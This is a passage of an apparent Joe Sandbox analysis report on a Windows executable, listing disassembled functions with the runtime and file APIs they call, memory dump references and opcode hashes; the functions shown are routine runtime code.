                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: CountCriticalInitializeSectionSpin
                                                                                    • String ID: InitializeCriticalSectionEx
                                                                                    • API String ID: 2593887523-3084827643
                                                                                    • Opcode ID: 59570abb12f7b4e67d36cfaa3ae6e7a467fc459a6a16ad84cab7b7a7761230b1
                                                                                    • Instruction ID: 692370d1904a11d8aee99a886fbb14197943b344958f40fc94a74c634b7fcf84
                                                                                    • Opcode Fuzzy Hash: 59570abb12f7b4e67d36cfaa3ae6e7a467fc459a6a16ad84cab7b7a7761230b1
                                                                                    • Instruction Fuzzy Hash: 2EF0B472A4520CBBCB056F50DC0AC9EBF65DF08720F408124FD19561A0DB728F109BC0
                                                                                    Function 0017784C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: Alloc
                                                                                    • String ID: FlsAlloc
                                                                                    • API String ID: 2773662609-671089009
                                                                                    • Opcode ID: eb9337fc30f98a10b154013eaaf880c17d2cf27121340f210cc8eed757aa2e45
                                                                                    • Instruction ID: 2fa9a6c54372db6f8819b8c2882ba7c54d07ac67c55c90049fec661b517f587e
                                                                                    • Opcode Fuzzy Hash: eb9337fc30f98a10b154013eaaf880c17d2cf27121340f210cc8eed757aa2e45
                                                                                    • Instruction Fuzzy Hash: 32E0E575B45218BBD319BF64EC0A96E7BA4DF58B20F414165FC0967280DF714F418BC6
                                                                                    Function 00171D9A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • try_get_function.LIBVCRUNTIME ref: 00171DAF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: try_get_function
                                                                                    • String ID: FlsAlloc
                                                                                    • API String ID: 2742660187-671089009
                                                                                    • Opcode ID: c859220a579db8e8313cad96b8bc9d0a5d06503d76a15b5084fe7c7c97c11484
                                                                                    • Instruction ID: d25e440a8c344cefad901177de0a83b53d05c47fe4c1a48b4043502a1f2b04f5
                                                                                    • Opcode Fuzzy Hash: c859220a579db8e8313cad96b8bc9d0a5d06503d76a15b5084fe7c7c97c11484
                                                                                    • Instruction Fuzzy Hash: 74D05B37F822287ED55536D5EC0699A7E5C8B00FB1F040051FF0C67146979146515BD1
                                                                                    Function 0016CD5C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0016CD6E
                                                                                      • Part of subcall function 0016CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0016CB39
                                                                                      • Part of subcall function 0016CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0016CB4A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID: 3Ro
                                                                                    • API String ID: 1269201914-1492261280
                                                                                    • Opcode ID: 2c24d47879e798f65046d50befb77e9481b27ac7469fecb8a671ebc88f56178f
                                                                                    • Instruction ID: c603beeafb7e2b1bb6d0fd9ecb8b11baa10632317897659f0fa8ea853521e77e
                                                                                    • Opcode Fuzzy Hash: 2c24d47879e798f65046d50befb77e9481b27ac7469fecb8a671ebc88f56178f
                                                                                    • Instruction Fuzzy Hash: 97B012C1299001FE712CB285AF02C3B010CC6D0F90370446FF882E5140BB405E1286B2
                                                                                    Function 00178618 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 001781EB: GetOEMCP.KERNEL32(00000000,?,?,00178474,?), ref: 00178216
                                                                                    • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,001784B9,?,00000000), ref: 0017868C
                                                                                    • GetCPInfo.KERNEL32(00000000,001784B9,?,?,?,001784B9,?,00000000), ref: 0017869F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: CodeInfoPageValid
                                                                                    • String ID:
                                                                                    • API String ID: 546120528-0
                                                                                    • Opcode ID: 8f0da7a57a71dc4e2c2f1ea1bcea86460c84662c6164e35757a8a012db160b07
                                                                                    • Instruction ID: 338c8de4f4e057c521aef2595046186ecb7bc58b174c8fb7f0ab35c1c8ce77e5
                                                                                    • Opcode Fuzzy Hash: 8f0da7a57a71dc4e2c2f1ea1bcea86460c84662c6164e35757a8a012db160b07
                                                                                    • Instruction Fuzzy Hash: A8513370A802459FDB288F35C8896BABBF5EF51314F24C06EE48F8B151DB359A46CB91
                                                                                    Function 00151383 Relevance: 3.1, APIs: 2, Instructions: 96COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 00151383
                                                                                      • Part of subcall function 00155FB1: __EH_prolog.LIBCMT ref: 00155FB6
                                                                                      • Part of subcall function 0015C413: __EH_prolog.LIBCMT ref: 0015C418
                                                                                      • Part of subcall function 0015C413: new.LIBCMT ref: 0015C45B
                                                                                      • Part of subcall function 0015C413: new.LIBCMT ref: 0015C47F
                                                                                    • new.LIBCMT ref: 001513FB
                                                                                      • Part of subcall function 0015AC66: __EH_prolog.LIBCMT ref: 0015AC6B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: H_prolog
                                                                                    • String ID:
                                                                                    • API String ID: 3519838083-0
                                                                                    • Opcode ID: 34adc805272fc996986b273172d65212011f51f3a70350f731045277185495d3
                                                                                    • Instruction ID: 08bd08c13f0d668d9780fefed65aca96cc5fdf03c21df6e7b9881d28b42f128b
                                                                                    • Opcode Fuzzy Hash: 34adc805272fc996986b273172d65212011f51f3a70350f731045277185495d3
                                                                                    • Instruction Fuzzy Hash: 0A4146B0905B40DED725DF798885AE6FAE5FF28300F40492ED9FE87282CB326554CB51
                                                                                    Function 0015137E Relevance: 3.1, APIs: 2, Instructions: 94COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 00151383
                                                                                      • Part of subcall function 00155FB1: __EH_prolog.LIBCMT ref: 00155FB6
                                                                                      • Part of subcall function 0015C413: __EH_prolog.LIBCMT ref: 0015C418
                                                                                      • Part of subcall function 0015C413: new.LIBCMT ref: 0015C45B
                                                                                      • Part of subcall function 0015C413: new.LIBCMT ref: 0015C47F
                                                                                    • new.LIBCMT ref: 001513FB
                                                                                      • Part of subcall function 0015AC66: __EH_prolog.LIBCMT ref: 0015AC6B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: H_prolog
                                                                                    • String ID:
                                                                                    • API String ID: 3519838083-0
                                                                                    • Opcode ID: 279732a6af59ddd82040d5996f3d21aed60e086aaa51c56a994dfd4fdaaedcda
                                                                                    • Instruction ID: 00b4d01cb30fea20e7cede75234c66cbff253fadd3fbbb7a175103c2be87028b
                                                                                    • Opcode Fuzzy Hash: 279732a6af59ddd82040d5996f3d21aed60e086aaa51c56a994dfd4fdaaedcda
                                                                                    • Instruction Fuzzy Hash: DB4137B0905B40DED725DF798885AE6FAE5FF28300F40492ED5FE87282CB326554CB51
                                                                                    Function 00178457 Relevance: 3.1, APIs: 2, Instructions: 91COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0017631F: GetLastError.KERNEL32(?,0018CBE8,00172674,0018CBE8,?,?,00172213,?,?,0018CBE8), ref: 00176323
                                                                                      • Part of subcall function 0017631F: _free.LIBCMT ref: 00176356
                                                                                      • Part of subcall function 0017631F: SetLastError.KERNEL32(00000000,?,0018CBE8), ref: 00176397
                                                                                      • Part of subcall function 0017631F: _abort.LIBCMT ref: 0017639D
                                                                                      • Part of subcall function 00178576: _abort.LIBCMT ref: 001785A8
                                                                                      • Part of subcall function 00178576: _free.LIBCMT ref: 001785DC
                                                                                      • Part of subcall function 001781EB: GetOEMCP.KERNEL32(00000000,?,?,00178474,?), ref: 00178216
                                                                                    • _free.LIBCMT ref: 001784CF
                                                                                    • _free.LIBCMT ref: 00178505
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$ErrorLast_abort
                                                                                    • String ID:
                                                                                    • API String ID: 2991157371-0
                                                                                    • Opcode ID: cea53a3605f47a9cd50acc097c1f54b2a1d465ee1ffe01267218cd24006c914d
                                                                                    • Instruction ID: 883282ad61a826a3bf04d12b94d1c1bbcf87ea95460a7b692dbb7e52ced03e7e
                                                                                    • Opcode Fuzzy Hash: cea53a3605f47a9cd50acc097c1f54b2a1d465ee1ffe01267218cd24006c914d
                                                                                    • Instruction Fuzzy Hash: 6E31B131944209AFDB10EFA8D448B9DBBF5EF50320F258199E90D9B291EFB69E41CB50
                                                                                    Function 001594F1 Relevance: 3.1, APIs: 2, Instructions: 86fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00159B87,?,?,00157735), ref: 00159579
                                                                                    • CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00159B87,?,?,00157735), ref: 001595AE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateFile
                                                                                    • String ID:
                                                                                    • API String ID: 823142352-0
                                                                                    • Opcode ID: 6bf74365083bc14db219d0ac249142bffbf53b4fae24de414b616507f71546ff
                                                                                    • Instruction ID: b01f9a731c7884022e1322ebe454b1dc4efbc54651fce486c277a261541a2ff0
                                                                                    • Opcode Fuzzy Hash: 6bf74365083bc14db219d0ac249142bffbf53b4fae24de414b616507f71546ff
                                                                                    • Instruction Fuzzy Hash: EC2104B1004748EFD7318F24C885BA7B7E8EB08365F00492EF8E68A591D374AD5D9B62
                                                                                    Function 00159A12 Relevance: 3.1, APIs: 2, Instructions: 82timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,?,00157436,?,?,?), ref: 00159A2C
                                                                                    • SetFileTime.KERNELBASE(?,?,?,?), ref: 00159ADC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$BuffersFlushTime
                                                                                    • String ID:
                                                                                    • API String ID: 1392018926-0
                                                                                    • Opcode ID: 63e92d2200ad7cbcb5d5763f5867adb0e0c758179fe3a988fd9dd023ed04819c
                                                                                    • Instruction ID: 094a5f5bbc1204b5c082cc5ce9aa79171618a48cd5f9ecba68397fa7bda22409
                                                                                    • Opcode Fuzzy Hash: 63e92d2200ad7cbcb5d5763f5867adb0e0c758179fe3a988fd9dd023ed04819c
                                                                                    • Instruction Fuzzy Hash: 9D21B132158285EFC711DB24C881AAABBD8AF96706F08091DFCA58B181D729ED4CC762
                                                                                    Function 00177735 Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00177795
                                                                                    • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 001777A2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressProc__crt_fast_encode_pointer
                                                                                    • String ID:
                                                                                    • API String ID: 2279764990-0
                                                                                    • Opcode ID: a73ca6990fbcb051c6f5e33dab72720528a5d83576b41acfe4215bfacfb1db6f
                                                                                    • Instruction ID: effd89dfe0f2a24117beaf5bc629329b2f0ee112ef251ce7b0ccc56ea4cb6376
                                                                                    • Opcode Fuzzy Hash: a73ca6990fbcb051c6f5e33dab72720528a5d83576b41acfe4215bfacfb1db6f
                                                                                    • Instruction Fuzzy Hash: 87112C37A042219BDB299E28ECC896A73B5AF84720F178221FD18EB6D4D731DD8187D1
                                                                                    Function 00159AEB Relevance: 3.1, APIs: 2, Instructions: 54COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 00159B21
                                                                                    • GetLastError.KERNEL32 ref: 00159B2D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorFileLastPointer
                                                                                    • String ID:
                                                                                    • API String ID: 2976181284-0
                                                                                    • Opcode ID: 3c65059995dd4def22f039ec28dfeff9827112222df7b711b14b26883b595db8
                                                                                    • Instruction ID: aeffa71f16f1aab89dff9ac8b1775168b6ff7cd22f574a95a187b4529909deb5
                                                                                    • Opcode Fuzzy Hash: 3c65059995dd4def22f039ec28dfeff9827112222df7b711b14b26883b595db8
                                                                                    • Instruction Fuzzy Hash: 1601DE70701304EBEB349E28EC49B6AB3DA9B84316F10453EB962CB680DB75D80CC722
                                                                                    Function 00159897 Relevance: 3.1, APIs: 2, Instructions: 52COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetFilePointer.KERNELBASE(000000FF,?,?,?), ref: 001598EB
                                                                                    • GetLastError.KERNEL32 ref: 001598F8
                                                                                      • Part of subcall function 001596AA: __EH_prolog.LIBCMT ref: 001596AF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorFileH_prologLastPointer
                                                                                    • String ID:
                                                                                    • API String ID: 4236474358-0
                                                                                    • Opcode ID: 19a1c79c28699e8738770899391c823fd8055fc50104ce2c2dde4261ff93aeaf
                                                                                    • Instruction ID: 7e1f6cb7208a9002f0eec66c7efcf51619c8344f314ddc650dc3100b79438800
                                                                                    • Opcode Fuzzy Hash: 19a1c79c28699e8738770899391c823fd8055fc50104ce2c2dde4261ff93aeaf
                                                                                    • Instruction Fuzzy Hash: CB01B13260024DDB8B188E5A8C44AAA7759AF52332719426DFD368F290D771DC0D8762
                                                                                    Function 00175AEA Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _free.LIBCMT ref: 00175B0B
                                                                                      • Part of subcall function 001759FC: RtlAllocateHeap.NTDLL(00000000,?,?,?,001723AA,?,0000015D,?,?,?,?,00172F29,000000FF,00000000,?,?), ref: 00175A2E
                                                                                    • HeapReAlloc.KERNEL32(00000000,?,00200000,?,?,0018CBE8,001517A1,?,?,?,?,00000000,?,00151378,?,?), ref: 00175B47
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: Heap$AllocAllocate_free
                                                                                    • String ID:
                                                                                    • API String ID: 2447670028-0
                                                                                    • Opcode ID: f9f9d6d32a56a4845e7f3503d1ede0b66eee477a47c4858f30f4d7f3a35583f0
                                                                                    • Instruction ID: 6543eb10548038449058265bec204a5dcc52d7845d1ed6de41ddd6b7204c9ee1
                                                                                    • Opcode Fuzzy Hash: f9f9d6d32a56a4845e7f3503d1ede0b66eee477a47c4858f30f4d7f3a35583f0
                                                                                    • Instruction Fuzzy Hash: 5BF06232605A15A6DB352A269C01F7A377F9F917B0B15C115F81C971A2DFF0D84081B1
                                                                                    Function 0015D142 Relevance: 3.0, APIs: 2, Instructions: 43COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadStringW.USER32(?,?,00000200,?), ref: 0015D187
                                                                                    • LoadStringW.USER32(?,?,00000200,?), ref: 0015D19D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: LoadString
                                                                                    • String ID:
                                                                                    • API String ID: 2948472770-0
                                                                                    • Opcode ID: ccafabfeec3b0ba195b8b5fd30747293422b6e90d8b676aff745160895e69e27
                                                                                    • Instruction ID: 58800ad9bb11825bfd2c3c0a4274758736e040814a484ae39d28430fe4fc5eee
                                                                                    • Opcode Fuzzy Hash: ccafabfeec3b0ba195b8b5fd30747293422b6e90d8b676aff745160895e69e27
                                                                                    • Instruction Fuzzy Hash: 55F0C232702628AFEA20AF50AC85F677A99EF153D6F010425FE949A861D7214E858BE0
                                                                                    Function 0015FCA6 Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetCurrentProcess.KERNEL32(?,?), ref: 0015FCB3
                                                                                    • GetProcessAffinityMask.KERNEL32(00000000), ref: 0015FCBA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$AffinityCurrentMask
                                                                                    • String ID:
                                                                                    • API String ID: 1231390398-0
                                                                                    • Opcode ID: 050828051e2d5ce6fff91235e99d800e07168e1c824034f3d4c28392aae76f2e
                                                                                    • Instruction ID: 64301908405d6fd2ba9d283edccde2dbb01f45ac78fa40d81c2695c3d52919ea
